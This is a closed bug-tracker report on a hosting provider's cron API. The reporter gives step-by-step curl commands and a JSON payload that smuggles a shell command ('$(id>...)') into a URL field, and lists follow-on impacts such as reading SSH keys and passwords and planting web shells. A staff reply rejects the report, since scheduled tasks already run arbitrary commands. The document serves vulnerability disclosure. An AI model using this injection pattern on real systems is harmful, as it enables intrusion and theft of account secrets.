- Status Closed
-
Assigned To
cbay - Private
Attached to Project: Security vulnerabilities
Opened by SiddharthSharma - 05.10.2026
Last edited by cbay - 05.10.2026
Opened by SiddharthSharma - 05.10.2026
Last edited by cbay - 05.10.2026
FS#518 - Remote Code Execution
Title: Cron TYPE_URLS Accepts Single-Quote in URL Argument — Shell Injection → Remote Code Execution
Severity: Critical
Summary
The cron job feature's TYPE_URLS type is documented as accepting "a list of URLs to request" — it is designed to fetch URLs via curl, not execute arbitrary shell commands (TYPE_COMMAND exists for that). However, the API accepts a single-quote ' character inside the URL argument without rejection. By injecting '$(cmd)' into the URL, the shell quoting is broken and cmd executes as a real command on alwaysdata's jobs server under the account's UID.
Steps to Reproduce
Prerequisites: Any alwaysdata account (free plan). API token from https://admin.alwaysdata.com/token/.
Step 1 — Write payload to file (prevents local shell expansion):
cat > /tmp/job.json << 'EOF'
{
"type": "TYPE_URLS",
"argument": "http://x.com/'$(id>/home/YOUR_ACCOUNT/www/rce_proof.txt)'",
"date_type": "FREQUENCY",
"frequency": 1,
"frequency_period": "minute"
}
EOF
Step 2 — Create the malicious cron job:
curl -u "YOUR_API_TOKEN account=YOUR_ACCOUNT:" \
-X POST "https://api.alwaysdata.com/v1/job/?format=json" \
-H "Content-Type: application/json" \
-d @/tmp/job.json \
-w "\nHTTP STATUS: %{http_code}\n"
Expected: HTTP STATUS: 201 — single-quote inside the URL is accepted with no error.
Step 3 — Wait up to 60 seconds for the cron to fire.
Step 4 — Verify RCE:
curl https://YOUR_ACCOUNT.alwaysdata.net/rce_proof.txt
Expected output:
uid=XXXXXX(YOUR_ACCOUNT) gid=XXXXXX(YOUR_ACCOUNT) groups=XXXXXX(YOUR_ACCOUNT)
This file was created by the injected id command running on alwaysdata's server.
Step 5 — Clean up:
# Get JOB_ID from the Step 2 response header Location or re-list jobs:
curl -u "YOUR_API_TOKEN account=YOUR_ACCOUNT:" \
"https://api.alwaysdata.com/v1/job/?format=json"
curl -u "YOUR_API_TOKEN account=YOUR_ACCOUNT:" \
-X DELETE "https://api.alwaysdata.com/v1/job/JOB_ID/?format=json"
Loading...
Available keyboard shortcuts
- Alt + ⇧ Shift + l Login Dialog / Logout
- Alt + ⇧ Shift + a Add new task
- Alt + ⇧ Shift + m My searches
- Alt + ⇧ Shift + t focus taskid search
Tasklist
- o open selected task
- j move cursor down
- k move cursor up
Task Details
- n Next task
- p Previous task
- Alt + ⇧ Shift + e ↵ Enter Edit this task
- Alt + ⇧ Shift + w watch task
- Alt + ⇧ Shift + y Close Task
Task Editing
- Alt + ⇧ Shift + s save task
Hello,
You can already execute any command you want when creating a scheduled task, so that's not a vulnerability.
Kind regards,
Cyril
Following is the Impact and Video P.O.C attacked below.
Impact
1. Full account RCE — arbitrary shell commands run on alwaysdata's jobs server as your account UID, giving read/write access to all account files (SSH keys, DB passwords, .env, source code).
2. No credentials needed for exploitation via chaining — an attacker who finds XSS/CSRF on the admin panel can plant this cron job on any victim account without knowing their password.
3. Persistent backdoor — attacker can write web shells, add cron jobs, or modify startup scripts that survive password resets.